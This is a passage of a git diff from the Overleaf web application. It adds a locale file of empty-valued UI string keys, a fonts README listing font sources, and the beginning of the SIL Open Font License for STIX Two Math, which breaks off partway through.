"processing_uppercase": "", + "professional": "", + "progress_bar_percentage": "", + "project_approaching_file_limit": "", + "project_failed_to_compile": "", + "project_figure_modal": "", + "project_files": "", + "project_flagged_too_many_compiles": "", + "project_has_too_many_files": "", + "project_last_published_at": "", + "project_layout_sharing_submission": "", + "project_linked_to": "", + "project_name": "", + "project_not_linked_to_github": "", + "project_ownership_transfer_confirmation_1": "", + "project_ownership_transfer_confirmation_2": "", + "project_renamed_or_deleted": "", + "project_renamed_or_deleted_detail": "", + "project_search_file_count": "", + "project_search_file_count_plural": "", + "project_search_result_count": "", + "project_search_result_count_plural": "", + "project_synchronisation": "", + "project_timed_out_enable_stop_on_first_error": "", + "project_timed_out_fatal_error": "", + "project_timed_out_intro": "", + "project_timed_out_learn_more": "", + "project_timed_out_optimize_images": "", + "project_title_options": "", + "project_too_large": "", + "project_too_large_please_reduce": "", + "project_too_much_editable_text": "", + "project_url": "", + "projects": "", + "projects_count": "", + "projects_list": "", + "provide_details_of_your_sso_configuration": "", + "public": "", + "publish": "", + "publish_as_template": "", + "publisher_account": "", + "publishing": "", + "pull_github_changes_into_sharelatex": "", + "push_sharelatex_changes_to_github": "", + "push_to_github_pull_to_overleaf": "", + "quoted_text": "", + "raw_logs": "", + "raw_logs_description": "", + "react_history_tutorial_content": "", + "react_history_tutorial_title": "", + "reactivate_subscription": "", + "read_lines_from_path": "", + "read_more": "", + "read_more_about_free_compile_timeouts_servers": "", + "read_only_dropbox_sync_message": "", + "read_only_token": "", + "read_write_token": "", + "ready_to_join_x": "", + "ready_to_join_x_in_group_y": "", + "ready_to_set_up": "", + "realtime_track_changes": "", + "reasons_for_compile_timeouts": "", + "reauthorize_github_account": "", + "recaptcha_conditions": "", + "recent_commits_in_github": "", + "recommended": "", + "recompile": "", + "recompile_from_scratch": "", + "recompile_pdf": "", + "reconfirm_secondary_email": "", + "reconnect": "", + "reconnecting": "", + "reconnecting_in_x_secs": "", + "recurly_email_update_needed": "", + "recurly_email_updated": "", + "redirect_to_editor": "", + "redirect_url": "", + "redo": "", + "reduce_costs_group_licenses": "", + "reference_error_relink_hint": "", + "reference_manager_searched_groups": "", + "reference_managers": "", + "reference_search": "", + "reference_search_setting": "", + "reference_search_settings": "", + "reference_search_style": "", + "reference_sync": "", + "references_from_these_libraries_will_be_included_in_your_reference_search_results": "", + "refresh": "", + "refresh_page_after_linking_dropbox": "", + "refresh_page_after_starting_free_trial": "", + "refreshing": "", + "regards": "", + "reject_change": "", + "reject_selected_changes": "", + "relink_your_account": "", + "reload_editor": "", + "remind_before_trial_ends": "", + "remote_service_error": "", + "remove": "", + "remove_access": "", + "remove_email_address": "", + "remove_from_group": "", + "remove_link": "", + "remove_manager": "", + "remove_or_replace_figure": "", + "remove_secondary_email_addresses": "", + "remove_sso_login_option": "", + "remove_tag": "", + "removed_from_project": "", + "removing": "", + "rename": "", + 
"rename_project": "", + "renews_on": "", + "reopen": "", + "reopen_comment_error_message": "", + "reopen_comment_error_title": "", + "replace_figure": "", + "replace_from_another_project": "", + "replace_from_computer": "", + "replace_from_project_files": "", + "replace_from_url": "", + "reply": "", + "repository_name": "", + "repository_visibility": "", + "republish": "", + "resend": "", + "resend_confirmation_code": "", + "resend_confirmation_email": "", + "resend_email": "", + "resend_group_invite": "", + "resend_link_sso": "", + "resend_managed_user_invite": "", + "resending_confirmation_code": "", + "resending_confirmation_email": "", + "resize": "", + "resolve_comment": "", + "resolve_comment_error_message": "", + "resolve_comment_error_title": "", + "resolved_comments": "", + "restore": "", + "restore_file": "", + "restore_file_confirmation_message": "", + "restore_file_confirmation_title": "", + "restore_file_error_message": "", + "restore_file_error_title": "", + "restore_file_version": "", + "restore_project_to_this_version": "", + "restore_this_version": "", + "resync_completed": "", + "resync_message": "", + "resync_project_history": "", + "retry_test": "", + "reverse_x_sort_order": "", + "revert_pending_plan_change": "", + "review": "", + "review_panel": "", + "review_panel_and_error_logs_moved_to_the_left": "", + "review_your_peers_work": "", + "reviewer": "", + "reviewer_dropbox_sync_message": "", + "reviewing": "", + "revoke": "", + "revoke_invite": "", + "right": "", + "role": "", + "saml_auth_error": "", + "saml_identity_exists_error": "", + "saml_invalid_signature_error": "", + "saml_login_disabled_error": "", + "saml_login_failure": "", + "saml_login_identity_mismatch_error": "", + "saml_login_identity_not_found_error": "", + "saml_metadata": "", + "saml_missing_signature_error": "", + "saml_response": "", + "save": "", + "save_20_percent_when_you_switch_to_annual": "", + "save_or_cancel-cancel": "", + "save_or_cancel-or": "", + "save_or_cancel-save": "", + "save_x_or_more": "", + "saving": "", + "saving_notification_with_seconds": "", + "search": "", + "search_all_project_files": "", + "search_bib_files": "", + "search_by_author_journal_title_and_more_link_to_zotero_mendeley_papers": "", + "search_by_citekey_author_year_title": "", + "search_command_find": "", + "search_command_replace": "", + "search_in_all_projects": "", + "search_in_archived_projects": "", + "search_in_shared_projects": "", + "search_in_trashed_projects": "", + "search_in_your_projects": "", + "search_match_case": "", + "search_next": "", + "search_only_the_bib_files_in_your_project_only_by_citekeys": "", + "search_previous": "", + "search_project": "", + "search_projects": "", + "search_references": "", + "search_regexp": "", + "search_replace": "", + "search_replace_all": "", + "search_replace_with": "", + "search_search_for": "", + "search_this_file": "", + "search_whole_word": "", + "search_within_selection": "", + "searched_path_for_lines_containing": "", + "security": "", + "see_changes_in_your_documents_live": "", + "see_suggestions_from_collaborators": "", + "select_a_column_or_a_merged_cell_to_align": "", + "select_a_column_to_adjust_column_width": "", + "select_a_file": "", + "select_a_file_figure_modal": "", + "select_a_group_optional": "", + "select_a_language": "", + "select_a_new_owner_for_projects": "", + "select_a_payment_method": "", + "select_a_project": "", + "select_a_project_figure_modal": "", + "select_a_row_or_a_column_to_delete": "", + "select_access_level": "", + 
"select_access_levels": "", + "select_all": "", + "select_all_projects": "", + "select_an_output_file": "", + "select_an_output_file_figure_modal": "", + "select_bib_file": "", + "select_cells_in_a_single_row_to_merge": "", + "select_color": "", + "select_folder_from_project": "", + "select_from_output_files": "", + "select_from_project_files": "", + "select_from_source_files": "", + "select_from_your_computer": "", + "select_github_repository": "", + "select_image_from_project_files": "", + "select_project": "", + "select_projects": "", + "select_size": "", + "select_tag": "", + "select_user": "", + "selected": "", + "selection_deleted": "", + "send_first_message": "", + "send_message": "", + "send_request": "", + "sending": "", + "sent": "", + "server_error": "", + "server_pro_license_entitlement_line_1": "", + "server_pro_license_entitlement_line_2": "", + "server_pro_license_entitlement_line_3": "", + "session_created_at": "", + "session_error": "", + "session_expired_redirecting_to_login": "", + "sessions": "", + "set_color": "", + "set_column_width": "", + "set_up_single_sign_on": "", + "set_up_sso": "", + "settings": "", + "setup_another_account_under_a_personal_email_address": "", + "share": "", + "share_project": "", + "shared_with_you": "", + "sharelatex_beta_program": "", + "shortcut_to_open_advanced_reference_search": "", + "show_all_projects": "", + "show_document_preamble": "", + "show_equation_preview": "", + "show_file_tree": "", + "show_hotkeys": "", + "show_in_code": "", + "show_in_pdf": "", + "show_less": "", + "show_live_equation_previews_while_typing": "", + "show_local_file_contents": "", + "show_more": "", + "show_outline": "", + "show_version_history": "", + "show_x_more_projects": "", + "showing_1_result": "", + "showing_1_result_of_total": "", + "showing_x_out_of_n_projects": "", + "showing_x_results": "", + "showing_x_results_of_total": "", + "sign_up": "", + "simple_search_mode": "", + "single_sign_on_sso": "", + "skip": "", + "something_not_right": "", + "something_went_wrong": "", + "something_went_wrong_canceling_your_subscription": "", + "something_went_wrong_loading_pdf_viewer": "", + "something_went_wrong_processing_the_request": "", + "something_went_wrong_rendering_pdf": "", + "something_went_wrong_rendering_pdf_expected": "", + "something_went_wrong_server": "", + "somthing_went_wrong_compiling": "", + "sorry_it_looks_like_that_didnt_work_this_time": "", + "sorry_there_are_no_experiments": "", + "sorry_there_was_an_issue_adding_x_users_to_your_subscription": "", + "sorry_there_was_an_issue_upgrading_your_subscription": "", + "sorry_you_can_only_change_to_group_from_trial_via_support": "", + "sorry_your_table_cant_be_displayed_at_the_moment": "", + "sort_by": "", + "sort_by_x": "", + "sort_projects": "", + "source": "", + "spell_check": "", + "spellcheck": "", + "spellcheck_language": "", + "split_view": "", + "sso": "", + "sso_active": "", + "sso_already_setup_good_to_go": "", + "sso_config_deleted": "", + "sso_config_prop_help_certificate": "", + "sso_config_prop_help_first_name": "", + "sso_config_prop_help_last_name": "", + "sso_config_prop_help_redirect_url": "", + "sso_config_prop_help_user_id": "", + "sso_configuration": "", + "sso_configuration_not_finalized": "", + "sso_configuration_saved": "", + "sso_disabled_by_group_admin": "", + "sso_error_audience_mismatch": "", + "sso_error_idp_error": "", + "sso_error_invalid_external_user_id": "", + "sso_error_invalid_signature": "", + "sso_error_missing_external_user_id": "", + 
"sso_error_missing_firstname_attribute": "", + "sso_error_missing_lastname_attribute": "", + "sso_error_missing_signature": "", + "sso_error_response_already_processed": "", + "sso_explanation": "", + "sso_here_is_the_data_we_received": "", + "sso_is_disabled": "", + "sso_is_disabled_explanation_1": "", + "sso_is_disabled_explanation_2": "", + "sso_is_enabled": "", + "sso_is_enabled_explanation_1": "", + "sso_is_enabled_explanation_1_sso_only": "", + "sso_is_enabled_explanation_2": "", + "sso_link_account_with_idp": "", + "sso_link_error": "", + "sso_link_invite_has_been_sent_to_email": "", + "sso_logs": "", + "sso_not_active": "", + "sso_reauth_request": "", + "sso_test_interstitial_info_1": "", + "sso_test_interstitial_info_2": "", + "sso_test_interstitial_title": "", + "sso_test_result_error_message": "", + "sso_user_explanation_enabled_with_admin_email": "", + "sso_user_explanation_enabled_with_group_name": "", + "sso_user_explanation_ready_with_admin_email": "", + "sso_user_explanation_ready_with_group_name": "", + "standard": "", + "start_a_free_trial": "", + "start_by_adding_your_email": "", + "start_by_fixing_the_first_error_in_your_doc": "", + "start_free_trial": "", + "start_free_trial_without_exclamation": "", + "start_the_conversation_by_saying_hello_or_sharing_an_update": "", + "start_typing_find_your_company": "", + "start_typing_find_your_organization": "", + "start_typing_find_your_university": "", + "stop_compile": "", + "stop_on_first_error": "", + "stop_on_first_error_enabled_description": "", + "stop_on_first_error_enabled_title": "", + "stop_on_validation_error": "", + "store_your_work": "", + "stretch_width_to_text": "", + "student": "", + "student_disclaimer": "", + "subject": "", + "subject_area": "", + "subject_to_additional_vat": "", + "submit_title": "", + "subscribe": "", + "subscribe_to_find_the_symbols_you_need_faster": "", + "subscribe_to_plan": "", + "subscription": "", + "subscription_admins_cannot_be_deleted": "", + "subscription_canceled": "", + "subscription_canceled_and_terminate_on_x": "", + "subscription_will_remain_active_until_end_of_billing_period_x": "", + "subscription_will_remain_active_until_end_of_trial_period_x": "", + "success_sso_set_up": "", + "suggest_a_different_fix": "", + "suggest_fix": "", + "suggested": "", + "suggested_fix_for_error_in_path": "", + "suggestion_applied": "", + "suggests_code_completions_while_typing": "", + "support_for_your_browser_is_ending_soon": "", + "supports_up_to_x_licenses": "", + "sure_you_want_to_cancel_plan_change": "", + "sure_you_want_to_change_plan": "", + "sure_you_want_to_delete": "", + "sure_you_want_to_leave_group": "", + "switch_back_to_monthly_pay_20_more": "", + "switch_compile_mode_for_faster_draft_compilation": "", + "switch_to_editor": "", + "switch_to_new_editor": "", + "switch_to_old_editor": "", + "switch_to_pdf": "", + "switch_to_standard_plan": "", + "symbol": "", + "symbol_palette": "", + "sync": "", + "sync_dropbox_github": "", + "sync_project_to_github_explanation": "", + "sync_to_dropbox": "", + "sync_to_github": "", + "synctex_failed": "", + "syntax_validation": "", + "tab_connecting": "", + "tab_no_longer_connected": "", + "table": "", + "table_generator": "", + "tag_color": "", + "tag_name_cannot_exceed_characters": "", + "tag_name_is_already_used": "", + "tags": "", + "take_short_survey": "", + "take_survey": "", + "tc_everyone": "", + "tc_guests": "", + "tell_the_project_owner_and_ask_them_to_upgrade": "", + "template": "", + "template_description": "", + 
"template_title_taken_from_project_title": "", + "templates": "", + "temporarily_hides_the_preview": "", + "terminated": "", + "test": "", + "test_configuration": "", + "test_configuration_successful": "", + "tex_live_version": "", + "texgpt": "", + "thank_you_exclamation": "", + "thank_you_for_your_feedback": "", + "thanks_for_being_part_of_this_labs_experiment_your_feedback_will_help_us_make_the_new_editor_the_best_yet": "", + "thanks_for_confirming_your_email_address": "", + "thanks_for_getting_in_touch": "", + "thanks_for_subscribing": "", + "thanks_for_subscribing_to_plan_with_add_on": "", + "thanks_for_subscribing_to_the_add_on": "", + "thanks_for_subscribing_you_help_sl": "", + "thanks_settings_updated": "", + "the_add_on_will_remain_active_until": "", + "the_code_editor_color_scheme": "", + "the_document_environment_contains_no_content": "", + "the_following_files_already_exist_in_this_project": "", + "the_following_files_and_folders_already_exist_in_this_project": "", + "the_following_folder_already_exists_in_this_project": "", + "the_following_folder_already_exists_in_this_project_plural": "", + "the_latex_engine_used_for_compiling": "", + "the_new_overleaf_editor": "", + "the_next_payment_will_be_collected_on": "", + "the_original_text_has_changed": "", + "the_overleaf_color_scheme": "", + "the_primary_file_for_compiling_your_project": "", + "the_target_folder_could_not_be_found": "", + "the_version_of_tex_live_used_for_compiling": "", + "the_width_you_choose_here_is_based_on_the_width_of_the_text_in_your_document": "", + "their_projects_will_be_transferred_to_another_user": "", + "then_x_price_per_month": "", + "then_x_price_per_year": "", + "there_are_lots_of_options_to_edit_and_customize_your_figures": "", + "there_is_an_unrecoverable_latex_error": "", + "there_was_a_problem_restoring_the_project_please_try_again_in_a_few_moments_or_contact_us": "", + "they_lose_access_to_account": "", + "this_action_cannot_be_reversed": "", + "this_action_cannot_be_undone": "", + "this_address_will_be_shown_on_the_invoice": "", + "this_could_be_because_we_cant_support_some_elements_of_the_table": "", + "this_experiment_isnt_accepting_new_participants": "", + "this_field_is_required": "", + "this_grants_access_to_features_2": "", + "this_is_a_labs_experiment_for_the_new_overleaf_editor_some_features_are_still_in_progress": "", + "this_is_a_new_feature": "", + "this_is_the_file_that_references_pulled_from_your_reference_manager_will_be_added_to": "", + "this_project_already_has_maximum_collaborators": "", + "this_project_contains_a_file_called_output": "", + "this_project_exceeded_collaborator_limit": "", + "this_project_exceeded_compile_timeout_limit_on_free_plan": "", + "this_project_has_more_than_max_collabs": "", + "this_project_is_public": "", + "this_project_is_public_read_only": "", + "this_project_need_more_time_to_compile": "", + "this_project_will_appear_in_your_dropbox_folder_at": "", + "this_tool_helps_you_insert_figures": "", + "this_tool_helps_you_insert_simple_tables_into_your_project_without_writing_latex_code_give_feedback": "", + "this_total_reflects_the_amount_due_until": "", + "this_was_helpful": "", + "this_wasnt_helpful": "", + "this_will_remove_primary_email": "", + "timedout": "", + "tip": "", + "title": "", + "to_add_email_accounts_need_to_be_linked_2": "", + "to_add_more_collaborators": "", + "to_change_access_permissions": "", + "to_confirm_transfer_enter_email_address": "", + "to_confirm_unlink_all_users_enter_email": "", + 
"to_continue_using_upgrade_or_change_your_browser": "", + "to_delete_your_writefull_account": "", + "to_fix_this_you_can": "", + "to_fix_this_you_can_ask_the_github_repository_owner": "", + "to_insert_or_move_a_caption_make_sure_tabular_is_directly_within_table": "", + "to_keep_edit_access": "", + "to_modify_your_subscription_go_to": "", + "to_pull_results_directly_from_your_reference_manager_enable_one_of_the_available_reference_manager_integrations": "", + "to_use_text_wrapping_in_your_table_make_sure_you_include_the_array_package": "", + "toggle_compile_options_menu": "", + "toggle_group": "", + "toggle_personal_library": "", + "toggle_unknown_group": "", + "token": "", + "token_access_failure": "", + "token_limit_reached": "", + "token_read_only": "", + "token_read_write": "", + "too_many_attempts": "", + "too_many_comments_or_tracked_changes": "", + "too_many_comments_or_tracked_changes_detail": "", + "too_many_confirm_code_resend_attempts": "", + "too_many_confirm_code_verification_attempts": "", + "too_many_files_uploaded_throttled_short_period": "", + "too_many_requests": "", + "too_many_search_results": "", + "too_recently_compiled": "", + "took_a_while": "", + "toolbar_bullet_list": "", + "toolbar_choose_section_heading_level": "", + "toolbar_code_visual_editor_switch": "", + "toolbar_decrease_indent": "", + "toolbar_editor": "", + "toolbar_format_bold": "", + "toolbar_format_italic": "", + "toolbar_generate_math": "", + "toolbar_generate_table": "", + "toolbar_increase_indent": "", + "toolbar_insert_citation": "", + "toolbar_insert_cross_reference": "", + "toolbar_insert_display_math": "", + "toolbar_insert_figure": "", + "toolbar_insert_inline_math": "", + "toolbar_insert_link": "", + "toolbar_insert_math": "", + "toolbar_insert_math_and_symbols": "", + "toolbar_insert_math_lowercase": "", + "toolbar_insert_misc": "", + "toolbar_insert_table": "", + "toolbar_list_indentation": "", + "toolbar_numbered_list": "", + "toolbar_redo": "", + "toolbar_selected_projects": "", + "toolbar_selected_projects_management_actions": "", + "toolbar_selected_projects_remove": "", + "toolbar_selected_projects_restore": "", + "toolbar_table_insert_size_table": "", + "toolbar_table_insert_table_lowercase": "", + "toolbar_text_formatting": "", + "toolbar_text_style": "", + "toolbar_toggle_symbol_palette": "", + "toolbar_undo": "", + "toolbar_undo_redo_actions": "", + "tools": "", + "tooltip_hide_filetree": "", + "tooltip_hide_panel": "", + "tooltip_hide_pdf": "", + "tooltip_show_filetree": "", + "tooltip_show_panel": "", + "tooltip_show_pdf": "", + "total_due_today": "", + "total_per_month": "", + "total_per_year": "", + "total_today": "", + "total_with_subtotal_and_tax": "", + "total_words": "", + "track_any_change_in_real_time": "", + "track_changes": "", + "track_changes_for_everyone": "", + "track_changes_for_guests": "", + "track_changes_for_x": "", + "track_changes_is_off": "", + "track_changes_is_on": "", + "tracked_change_added": "", + "tracked_change_deleted": "", + "transfer_management_of_your_account": "", + "transfer_management_of_your_account_to_x": "", + "transfer_management_resolve_following_issues": "", + "transfer_this_users_projects": "", + "transfer_this_users_projects_description": "", + "transferring": "", + "trash": "", + "trash_projects": "", + "trashed": "", + "trashed_projects": "", + "trashing_projects_wont_affect_collaborators": "", + "trial_last_day": "", + "trial_remaining_days": "", + "tried_to_log_in_with_email": "", + "tried_to_register_with_email": "", + 
"troubleshooting_tip": "", + "try_again": "", + "try_for_free": "", + "try_it_for_free": "", + "try_now": "", + "try_papers_for_free": "", + "try_premium_for_free": "", + "try_recompile_project_or_troubleshoot": "", + "try_relinking_provider": "", + "try_the_new_editor": "", + "try_to_compile_despite_errors": "", + "turn_off": "", + "turn_off_link_sharing": "", + "turn_on": "", + "turn_on_link_sharing": "", + "tutorials": "", + "unarchive": "", + "uncategorized": "", + "uncategorized_projects": "", + "unconfirmed": "", + "undelete": "", + "understanding_labels": "", + "undo": "", + "unfold_line": "", + "unique_identifier_attribute": "", + "university": "", + "university_school": "", + "unknown": "", + "unknown_group": "", + "unlimited_collaborators_per_project": "", + "unlimited_collabs": "", + "unlimited_document_history": "", + "unlimited_projects": "", + "unlink": "", + "unlink_all_users": "", + "unlink_all_users_explanation": "", + "unlink_dropbox_folder": "", + "unlink_dropbox_warning": "", + "unlink_github_repository": "", + "unlink_github_warning": "", + "unlink_linked_accounts": "", + "unlink_linked_google_account": "", + "unlink_provider_account_title": "", + "unlink_provider_account_warning": "", + "unlink_reference": "", + "unlink_the_project_from_the_current_github_repo": "", + "unlink_user": "", + "unlink_user_explanation": "", + "unlink_users": "", + "unlink_warning_reference": "", + "unlinking": "", + "unmerge_cells": "", + "unpause_subscription": "", + "unpublish": "", + "unpublishing": "", + "unsubscribe": "", + "until_then_you_can_still": "", + "untrash": "", + "update": "", + "update_account_info": "", + "update_dropbox_settings": "", + "update_your_billing_details": "", + "updates_to_project_sharing": "", + "updating": "", + "upgrade": "", + "upgrade_cc_btn": "", + "upgrade_for_12x_more_compile_time": "", + "upgrade_my_plan": "", + "upgrade_now": "", + "upgrade_plan": "", + "upgrade_summary": "", + "upgrade_to_add_more_collaborators_and_access_collaboration_features": "", + "upgrade_to_get_feature": "", + "upgrade_to_review": "", + "upgrade_to_track_changes": "", + "upgrade_to_unlock_more_time": "", + "upgrade_your_subscription": "", + "upload": "", + "upload_file": "", + "upload_from_computer": "", + "upload_project": "", + "upload_zipped_project": "", + "url_to_fetch_the_file_from": "", + "us_gov_banner_fedramp": "", + "us_gov_banner_government_purchasing": "", + "us_gov_banner_small_business_reseller": "", + "usage_metrics": "", + "use_a_different_password": "", + "use_saml_metadata_to_configure_sso_with_idp": "", + "use_your_own_machine": "", + "used_latex_before": "", + "used_latex_response_never": "", + "used_latex_response_occasionally": "", + "used_latex_response_often": "", + "used_when_referring_to_the_figure_elsewhere_in_the_document": "", + "user_deletion_error": "", + "user_deletion_password_reset_tip": "", + "user_first_name_attribute": "", + "user_last_name_attribute": "", + "user_sessions": "", + "using_latex": "", + "using_premium_features": "", + "using_the_overleaf_editor": "", + "using_writefull": "", + "valid": "", + "valid_sso_configuration": "", + "validation_issue_entry_description": "", + "value_must_be_a_number": "", + "value_must_be_a_whole_number": "", + "value_must_be_at_least_x": "", + "vat": "", + "vat_number": "", + "verify_email_address_before_enabling_managed_users": "", + "view": "", + "view_all": "", + "view_billing_details": "", + "view_code": "", + "view_configuration": "", + "view_group_members": "", + "view_hub": "", + 
"view_hub_subtext": "", + "view_in_template_gallery": "", + "view_invitation": "", + "view_invoices": "", + "view_labs_experiments": "", + "view_less": "", + "view_logs": "", + "view_metrics": "", + "view_metrics_commons_subtext": "", + "view_metrics_group_subtext": "", + "view_more": "", + "view_only_access": "", + "view_only_downgraded": "", + "view_only_reviewer_downgraded": "", + "view_options": "", + "view_pdf": "", + "view_your_invoices": "", + "viewer": "", + "viewing": "", + "viewing_x": "", + "visual_editor": "", + "visual_editor_is_only_available_for_tex_files": "", + "want_change_to_apply_before_plan_end": "", + "we_are_unable_to_generate_the_pdf_at_this_time": "", + "we_are_unable_to_opt_you_into_this_experiment": "", + "we_cant_find_any_sections_or_subsections_in_this_file": "", + "we_do_not_share_personal_information": "", + "we_got_your_request": "", + "we_logged_you_in": "", + "we_sent_code": "", + "we_sent_new_code": "", + "we_will_charge_you_now_for_the_cost_of_your_additional_licenses_based_on_remaining_months": "", + "we_will_charge_you_now_for_your_new_plan_based_on_the_remaining_months_of_your_current_subscription": "", + "we_will_use_your_existing_payment_method": "", + "webinars": "", + "website_status": "", + "wed_love_you_to_stay": "", + "welcome_to_sl": "", + "well_be_here_when_youre_ready": "", + "were_making_some_changes_to_project_sharing_this_means_you_will_be_visible": "", + "were_performing_maintenance": "", + "were_redesigning_our_editor_to_make_it_easier_to_use": "", + "weve_recently_reduced_the_compile_timeout_limit_which_may_have_affected_this_project": "", + "weve_recently_reduced_the_compile_timeout_limit_which_may_have_affected_your_project": "", + "what_do_you_need_help_with": "", + "what_does_this_mean": "", + "what_does_this_mean_for_you": "", + "what_happens_when_sso_is_enabled": "", + "what_should_we_call_you": "", + "whats_new": "", + "whats_next": "", + "when_you_tick_the_include_caption_box": "", + "why_latex": "", + "why_might_this_happen": "", + "why_not_pause_instead": "", + "wide": "", + "will_lose_edit_access_on_date": "", + "with_premium_subscription_you_also_get": "", + "word_count": "", + "work_in_vim_or_emacs_emulation_mode": "", + "work_offline": "", + "work_offline_pull_to_overleaf": "", + "work_with_non_overleaf_users": "", + "work_with_other_github_users": "", + "write_faster_smarter_with_overleaf_and_writefull_ai_tools": "", + "writefull": "", + "writefull_loading_error_body": "", + "writefull_loading_error_title": "", + "x_changes_in": "", + "x_changes_in_plural": "", + "x_libraries_accessed_in_this_project": "", + "x_price_for_first_month": "", + "x_price_for_first_year": "", + "x_price_for_y_months": "", + "x_price_per_month": "", + "x_price_per_user": "", + "x_price_per_year": "", + "year": "", + "yes_move_me_to_personal_plan": "", + "you": "", + "you_already_have_a_subscription": "", + "you_are_a_manager_and_member_of_x_plan_as_member_of_group_subscription_y_administered_by_z": "", + "you_are_a_manager_and_member_of_x_plan_as_member_of_group_subscription_y_administered_by_z_you": "", + "you_are_a_manager_of_commons_at_institution_x": "", + "you_are_a_manager_of_publisher_x": "", + "you_are_a_manager_of_x_plan_as_member_of_group_subscription_y_administered_by_z": "", + "you_are_a_manager_of_x_plan_as_member_of_group_subscription_y_administered_by_z_you": "", + "you_are_now_saving_20_percent": "", + "you_are_on_a_paid_plan_contact_support_to_find_out_more": "", + "you_are_on_x_plan_as_a_confirmed_member_of_institution_y": "", 
+ "you_are_on_x_plan_as_member_of_group_subscription_y_administered_by_z": "", + "you_can_also_choose_to_view_anonymously_or_leave_the_project": "", + "you_can_buy_this_plan_but_not_as_a_trial": "", + "you_can_leave_the_experiment_from_your_account_settings_at_any_time": "", + "you_can_manage_your_reference_manager_integrations_from_your_account_settings_page": "", + "you_can_now_enable_sso": "", + "you_can_now_log_in_sso": "", + "you_can_now_sync_your_papers_library_directly_with_your_overleaf_projects": "", + "you_can_request_a_maximum_of_limit_fixes_per_day": "", + "you_can_select_or_invite_collaborator": "", + "you_can_select_or_invite_collaborator_plural": "", + "you_can_still_use_your_premium_features": "", + "you_cant_add_or_change_password_due_to_sso": "", + "you_cant_join_this_group_subscription": "", + "you_dont_have_any_add_ons_on_your_account": "", + "you_dont_have_any_repositories": "", + "you_have_0_free_suggestions_left": "", + "you_have_1_free_suggestion_left": "", + "you_have_1_license_and_your_plan_supports_up_to_y": "", + "you_have_added_x_of_group_size_y": "", + "you_have_been_invited_to_transfer_management_of_your_account": "", + "you_have_been_invited_to_transfer_management_of_your_account_to": "", + "you_have_been_removed_from_this_project_and_will_be_redirected_to_project_dashboard": "", + "you_have_x_licenses_and_your_plan_supports_up_to_y": "", + "you_have_x_licenses_on_your_subscription": "", + "you_need_to_configure_your_sso_settings": "", + "you_unpaused_your_subscription": "", + "you_will_be_able_to_reassign_subscription": "", + "youll_get_best_results_in_visual_but_can_be_used_in_source": "", + "youll_need_to_ask_the_github_repository_owner": "", + "youll_no_longer_need_to_remember_credentials": "", + "your_account_is_managed_by_admin_cant_join_additional_group": "", + "your_account_is_managed_by_your_group_admin": "", + "your_add_on_has_been_cancelled_and_will_remain_active_until_your_billing_cycle_ends_on": "", + "your_affiliation_is_confirmed": "", + "your_browser_does_not_support_this_feature": "", + "your_changes_will_save": "", + "your_compile_timed_out": "", + "your_current_plan": "", + "your_current_plan_gives_you": "", + "your_current_plan_supports_up_to_x_licenses": "", + "your_current_project_will_revert_to_the_version_from_time": "", + "your_git_access_info": "", + "your_git_access_info_bullet_1": "", + "your_git_access_info_bullet_2": "", + "your_git_access_info_bullet_3": "", + "your_git_access_info_bullet_4": "", + "your_git_access_info_bullet_5": "", + "your_git_access_tokens": "", + "your_message_to_collaborators": "", + "your_name_and_email_address_will_be_visible_to_the_project_owner_and_other_editors": "", + "your_new_plan": "", + "your_password_was_detected": "", + "your_plan": "", + "your_plan_is_changing_at_term_end": "", + "your_plan_is_limited_to_n_editors": "", + "your_plan_is_limited_to_n_editors_plural": "", + "your_premium_plan_is_paused": "", + "your_project_exceeded_collaborator_limit": "", + "your_project_exceeded_compile_timeout_limit_on_free_plan": "", + "your_project_near_compile_timeout_limit": "", + "your_project_need_more_time_to_compile": "", + "your_projects": "", + "your_role": "", + "your_subscription": "", + "your_subscription_has_expired": "", + "your_subscription_will_pause_on": "", + "your_subscription_will_pause_on_short": "", + "youre_a_member_of_overleaf_labs": "", + "youre_about_to_disable_single_sign_on": "", + "youre_about_to_enable_single_sign_on": "", + "youre_about_to_enable_single_sign_on_sso_only": "", 
+ "youre_adding_x_licenses_to_your_plan_giving_you_a_total_of_y_licenses": "", + "youre_already_setup_for_sso": "", + "youre_helping_us_shape_the_future_of_overleaf": "", + "youre_joining": "", + "youre_on_free_trial_which_ends_on": "", + "youre_signed_in_as_logout": "", + "youve_added_more_licenses": "", + "youve_added_x_more_licenses_to_your_subscription_invite_people": "", + "youve_lost_collaboration_access": "", + "youve_paused_your_subscription": "", + "youve_unlinked_all_users": "", + "youve_upgraded_your_plan": "", + "zoom_in": "", + "zoom_out": "", + "zoom_to": "", + "zotero_dynamic_sync_description": "", + "zotero_groups_loading_error": "", + "zotero_groups_relink": "", + "zotero_integration": "", + "zotero_is_premium": "", + "zotero_reference_loading_error": "", + "zotero_reference_loading_error_expired": "", + "zotero_reference_loading_error_forbidden": "", + "zotero_sync_description": "", + "zotero_upgrade_prompt_content": "", + "zotero_upgrade_prompt_title": "" +} diff --git a/services/web/frontend/fonts/README.md b/services/web/frontend/fonts/README.md new file mode 100644 index 0000000..c07309c --- /dev/null +++ b/services/web/frontend/fonts/README.md @@ -0,0 +1,13 @@ +This directory contains fonts used by the Overleaf web application. + +* [DM Mono](https://github.com/googlefonts/dm-mono) +* [Font Awesome](https://fontawesome.com/v4/) +* [Lato](https://www.latofonts.com/) +* [Material Symbols](https://github.com/google/material-design-icons) +* [Merriweather](https://github.com/SorkinType/Merriweather) +* [Noto Sans](https://notofonts.github.io/#latin-greek-cyrillic) +* [Noto Serif](https://notofonts.github.io/#latin-greek-cyrillic) +* [OpenDyslexic Mono](https://github.com/antijingoist/opendyslexic/tree/master) +* [Open Sans](https://github.com/googlefonts/opensans) +* [Source Code Pro](https://github.com/adobe-fonts/source-code-pro) +* [STIX Two Math](https://github.com/stipub/stixfonts/) diff --git a/services/web/frontend/fonts/STIXTwoMath/OFL.txt b/services/web/frontend/fonts/STIXTwoMath/OFL.txt new file mode 100644 index 0000000..11b7b8e --- /dev/null +++ b/services/web/frontend/fonts/STIXTwoMath/OFL.txt @@ -0,0 +1,92 @@ +Copyright 2001-2021 The STIX Fonts Project Authors (https://github.com/stipub/stixfonts), with Reserved Font Name "TM Math". STIX Fonts™ is a trademark of The Institute of Electrical and Electronics Engineers, Inc. + +This Font Software is licensed under the SIL Open Font License, Version 1.1. +This license is copied below, and is also available with a FAQ at: +http://scripts.sil.org/OFL + +----------------------------------------------------------- +SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007 +----------------------------------------------------------- + +PREAMBLE +The goals of the Open Font License (OFL) are to stimulate worldwide +development of collaborative font projects, to support the font creation +efforts of academic and linguistic communities, and to provide a free and +open framework in 